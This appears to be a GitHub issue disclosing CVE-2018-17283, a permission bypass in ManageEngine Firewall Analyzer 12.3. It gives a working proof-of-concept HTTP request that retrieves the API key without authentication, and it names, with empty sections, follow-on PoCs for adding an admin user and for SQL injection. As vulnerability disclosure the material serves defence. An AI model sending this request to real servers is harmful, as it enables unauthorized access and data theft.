Firewall Analyzer 12.3 Build 123183 has permission bypass Vulnerability which can lead to information disclosure and SQL injection
Proof of Concept:
Getting the apikey unauthorizedly:
GET /oputilsServlet?action=getAPIKey HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0
The text was updated successfully, but these errors were encountered:
x-f1v3
changed the title
Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection
[CVE-2018-17283]Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection
Sep 29, 2018
Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection
Date: 2018/09/03
Software Link: https://www.manageengine.com/products/firewall/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: jacky.xing@dbappsecurity.com.cn
Firewall Analyzer 12.3 Build 123183 has permission bypass Vulnerability which can lead to information disclosure and SQL injection
Proof of Concept:
Getting the apikey unauthorizedly:
Local site test:

Add the admin user by only using the apikey poc:
Local site test:


Sql injection by only using the apikey poc:
The text was updated successfully, but these errors were encountered: